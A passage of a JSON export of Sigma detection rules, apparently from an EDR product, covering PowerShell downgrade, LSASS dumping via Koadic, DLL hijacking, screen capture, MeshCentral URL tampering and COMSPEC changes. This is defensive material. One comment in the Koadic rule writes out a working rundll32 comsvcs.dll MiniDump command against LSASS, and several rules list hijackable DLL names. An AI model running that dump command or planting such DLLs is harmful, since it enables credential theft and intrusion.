"rule_description": "Detects PowerShell being executed in a version that does not support the Windows Anti-Malware Scanning Interface (AMSI) or event logging.\nAdversaries can downgrade PowerShell to a version that does not support AMSI or event logging to evade detection.\nIt is recommended to examine the parent process as well as the PowerShell commands executed by the detected process to determine whether this action was legitimate.\n",
"rule_creation_date": "2025-10-06",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cce237f3-db0e-4f5e-90da-54d4d93e8f20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091151Z",
"creation_date": "2026-03-23T11:45:34.091154Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091158Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/techniques/T1003/001/",
"https://attack.mitre.org/software/S0250/"
],
"name": "t1003_001_koadic_lsass_dump.yml",
"content": "title: LSASS Dumped via Koadic\nid: cce237f3-db0e-4f5e-90da-54d4d93e8f20\ndescription: |\n Detects an attempt to dump the LSASS (Local Security Authority Subsystem Service) process memory via the Koadic HackTool.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct lateral movement.\n It is recommended to analyze the process and user session responsible for this execution to look for malicious content or actions.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/techniques/T1003/001/\n - https://attack.mitre.org/software/S0250/\ndate: 2021/02/18\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - attack.s0250\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Koadic\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 672 %TEMP%\\1107b58e-498d-85a2-a778-c5ed82bc09fa.bin full\n selection_1:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_2:\n CommandLine|contains|all:\n - '?:\\Windows\\system32\\comsvcs.dll, '\n - 'MiniDump '\n - '\\\\????????-????-????-????-????????????.bin '\n - 'full'\n\n condition: all of selection_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cce237f3-db0e-4f5e-90da-54d4d93e8f20",
"rule_name": "LSASS Dumped via Koadic",
"rule_description": "Detects an attempt to dump the LSASS (Local Security Authority Subsystem Service) process memory via the Koadic HackTool.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nAfter a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct lateral movement.\nIt is recommended to analyze the process and user session responsible for this execution to look for malicious content or actions.\n",
"rule_creation_date": "2021-02-18",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cd208e59-071b-4df4-8703-7a3498fce4b9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589278Z",
"creation_date": "2026-03-23T11:45:34.589284Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589296Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_jps.yml",
"content": "title: DLL Hijacking via jps.exe\nid: cd208e59-071b-4df4-8703-7a3498fce4b9\ndescription: |\n Detects potential Windows DLL Hijacking via jps.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'jps.exe'\n ImageLoaded|endswith: '\\jli.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Oracle'\n - '?:\\Program Files (x86)\\Oracle'\n - '?:\\Program Files\\Common Files\\Oracle\\Java\\'\n - '?:\\Program Files (x86)\\Common Files\\Oracle\\Java\\'\n - '?:\\Program Files\\Java'\n - '?:\\Program Files (x86)\\Java'\n - '?:\\Program Files\\AdoptOpenJDK\\jdk-*\\bin\\'\n - '?:\\Program Files (x86)\\AdoptOpenJDK\\jdk-*\\bin\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Oracle'\n - '?:\\Program Files (x86)\\Oracle'\n - '?:\\Program Files\\Common Files\\Oracle\\Java\\'\n - '?:\\Program Files (x86)\\Common Files\\Oracle\\Java\\'\n - '?:\\Program Files\\Java'\n - '?:\\Program 
Files (x86)\\Java'\n - '?:\\Program Files\\AdoptOpenJDK\\jdk-*\\bin\\'\n - '?:\\Program Files (x86)\\AdoptOpenJDK\\jdk-*\\bin\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Oracle America, Inc.'\n - 'Eclipse.org Foundation, Inc.'\n - 'Azul Systems, Inc.' # '?:\\Program Files (x86)\\Siemens\\kgw\\jre\\bin\\jps.exe'\n - 'SAP SE' # \\SAP BusinessObjects\\SAP BusinessObjects Enterprise XI 4.0\\win64_x64\\sapjvm\\bin\\jps.exe\n - 'London Jamocha Community CIC' # AdoptOpenJDK\n - 'Microsoft Corporation'\n - 'Amazon.com Services LLC'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cd208e59-071b-4df4-8703-7a3498fce4b9",
"rule_name": "DLL Hijacking via jps.exe",
"rule_description": "Detects potential Windows DLL Hijacking via jps.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nLoads of jli.dll by jps.exe from the Oracle, Java and AdoptOpenJDK installation paths, or of a jli.dll signed by one of the listed publishers, are not reported.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cd2380a2-e760-4c6f-aa15-66b3c694a085",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098825Z",
"creation_date": "2026-03-23T11:45:34.098827Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098831Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fsavailux.yml",
"content": "title: DLL Hijacking via fsavailux.exe\nid: cd2380a2-e760-4c6f-aa15-66b3c694a085\ndescription: |\n Detects potential Windows DLL Hijacking via fsavailux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n An alert means a Microsoft-signed fsavailux.exe running from outside System32, SysWOW64 or WinSxS loaded DEVOBJ.dll or ifsutil.dll from a location also outside those directories, and the loaded library is not itself signed by Microsoft Windows.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fsavailux.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cd2380a2-e760-4c6f-aa15-66b3c694a085",
"rule_name": "DLL Hijacking via fsavailux.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fsavailux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nAn alert means a Microsoft-signed fsavailux.exe running from outside System32, SysWOW64 or WinSxS loaded DEVOBJ.dll or ifsutil.dll from a location also outside those directories, and the loaded library is not itself signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cd448b91-b77f-4dd8-abf4-22ce6fa3141b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295442Z",
"creation_date": "2026-03-23T11:45:35.295446Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295452Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md",
"https://www.loobins.io/binaries/screencapture/",
"https://attack.mitre.org/techniques/T1113/"
],
"name": "t1113_screencapture.yml",
"content": "title: Screen Captured via Screencapture\nid: cd448b91-b77f-4dd8-abf4-22ce6fa3141b\ndescription: |\n Detects the execution of screencapture.\n Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\n This alert can be used to correlate activity in an undergoing operation.\n It is recommended to check for other malicious actions by the process launching Screencapture.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md\n - https://www.loobins.io/binaries/screencapture/\n - https://attack.mitre.org/techniques/T1113/\ndate: 2022/07/21\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1113\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Screencapture\n - classification.macOS.Behavior.Collection\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/screencapture'\n ParentImage|contains: '?'\n\n exclusion_image:\n # System UI spawning it for capture via keyboard shortcuts\n - ParentImage:\n - '/System/Library/CoreServices/SystemUIServer.app/Contents/MacOS/SystemUIServer'\n - '/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow'\n - '/System/Applications/QuickTime Player.app/Contents/XPCServices/com.apple.quicktimeplayer.SharedPrefsVendor.xpc/Contents/MacOS/com.apple.quicktimeplayer.SharedPrefsVendor'\n - '/Applications/iCapturer.app/Contents/MacOS/iCapturer'\n - '/Applications/Shottr.app/Contents/MacOS/Shottr'\n - '/Library/Application Support/Logitech.localized/LogiOptionsPlus/logioptionsplus_agent.app/Contents/MacOS/logioptionsplus_agent'\n - '/Applications/Logi Options.app/Contents/Support/LogiMgrDaemon.app/Contents/MacOS/LogiMgrDaemon'\n - '/Applications/Setapp/CleanShot X.app/Contents/MacOS/CleanShot X Setapp'\n - '/Applications/CleanShot X.app/Contents/MacOS/CleanShot X'\n - 
'/Applications/TextSniper.app/Contents/MacOS/TextSniper'\n - '/Applications/Adobe Acrobat DC/Adobe Acrobat.app/Contents/MacOS/AdobeAcrobat'\n - '/Applications/TRex.app/Contents/MacOS/TRex'\n - '/Applications/Zappy.app/Contents/MacOS/Zappy'\n - GrandparentImage:\n - '/Applications/Raycast.app/Contents/MacOS/Raycast'\n - '/Applications/Gyazo.app/Contents/MacOS/Gyazo'\n\n exclusion_jamf:\n ParentCommandLine|startswith: '/bin/sh /library/application support/jamf/tmp/'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cd448b91-b77f-4dd8-abf4-22ce6fa3141b",
"rule_name": "Screen Captured via Screencapture",
"rule_description": "Detects the execution of screencapture.\nAdversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nThis alert can be used to correlate activity in an ongoing operation.\nExecutions spawned by the system UI (keyboard-shortcut captures), by the listed screenshot applications and by Jamf scripts are excluded.\nIt is recommended to check for other malicious actions by the parent process launching screencapture.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1113"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cd572f3d-b60f-49de-a256-8d14da21832a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073809Z",
"creation_date": "2026-03-23T11:45:34.073811Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073816Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1558861977379868672",
"https://meshcentral.com/info/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1112_meshcentral_server_url_registry_configuration.yml",
"content": "title: MeshCentral Server URL Configured in Registry\nid: cd572f3d-b60f-49de-a256-8d14da21832a\ndescription: |\n Detects the creation or modification of a MeshCentral registry server URL configuration.\n MeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\n Attackers can change this URL to make the MeshCentral agent point to a malicious server controlled by the attacker.\n It is recommended to investigate any actions taken by MeshCentral and to determine if this RMM tool is expected in your environment.\n If this RMM software is common in your environment, it is recommended to disable this rule.\nreferences:\n - https://twitter.com/malmoeb/status/1558861977379868672\n - https://meshcentral.com/info/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/08/23\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.Registry\n - classification.Windows.RMM.MeshCentral\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType:\n - 'CreateKey'\n - 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\\\*\\MeshServerUrl'\n\n filter_local:\n Details: 'local'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cd572f3d-b60f-49de-a256-8d14da21832a",
"rule_name": "MeshCentral Server URL Configured in Registry",
"rule_description": "Detects the creation or modification of the MeshCentral agent server URL (MeshServerUrl) in the registry.\nMeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\nAttackers can change this URL to make the MeshCentral agent point to a malicious server controlled by the attacker.\nA value of 'local' is ignored by this rule.\nIt is recommended to investigate any actions taken by MeshCentral, to verify that the configured URL belongs to an expected server, and to determine if this RMM tool is expected in your environment.\nIf this RMM software is common in your environment, it is recommended to restrict this rule to unexpected server URLs or to disable it.\n",
"rule_creation_date": "2022-08-23",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdc1f23a-588d-47a8-8fb4-ec10e44ac623",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076336Z",
"creation_date": "2026-03-23T11:45:34.076338Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076342Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sdclt.yml",
"content": "title: DLL Hijacking via sdclt.exe\nid: cdc1f23a-588d-47a8-8fb4-ec10e44ac623\ndescription: |\n Detects potential Windows DLL Hijacking via sdclt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sdclt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\PROPSYS.dll'\n - '\\ReAgent.dll'\n - '\\SPP.dll'\n - '\\SspiCli.dll'\n - '\\UxTheme.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft 
Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdc1f23a-588d-47a8-8fb4-ec10e44ac623",
"rule_name": "DLL Hijacking via sdclt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sdclt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nAn alert means a Microsoft-signed sdclt.exe running from outside System32, SysWOW64 or WinSxS loaded one of the listed DLLs from a location also outside those directories, and the loaded library is not itself signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdc56022-c828-4e2a-a235-31810f322716",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610786Z",
"creation_date": "2026-03-23T11:45:34.610789Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610797Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1112_comspec_environment_variable_modification.yml",
"content": "title: COMSPEC User Environment Variable Modified\nid: cdc56022-c828-4e2a-a235-31810f322716\ndescription: |\n Detects the modification of the COMSPEC user environment variable.\n COMSPEC is not normally defined among the user environment variables.\n Attackers can use this newly defined or modified variable to perform a signed script proxy execution and take over control of a legitimate script.\n An empty value and the default ?:\\windows\\system32\\cmd.exe path are ignored by this rule.\n It is recommended to investigate the process at the origin of this registry modification to determine the legitimacy of this action.\nreferences:\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/21\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.t1216\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*\\Environment\\comspec'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName: 'HKU\\\\*\\Environment\\comspec'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_cmd:\n Details: '?:\\windows\\system32\\cmd.exe'\n\n condition: ((selection_set and not filter_empty) or selection_rename) and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdc56022-c828-4e2a-a235-31810f322716",
"rule_name": "COMSPEC User Environment Variable Modified",
"rule_description": "Detects the modification of the COMSPEC user environment variable.\nCOMSPEC is not normally defined among the user environment variables.\nAttackers can use this newly defined or modified variable to perform a signed script proxy execution and take over control of a legitimate script.\nAn empty value and the default ?:\\windows\\system32\\cmd.exe path are ignored by this rule.\nIt is recommended to investigate the process at the origin of this registry modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
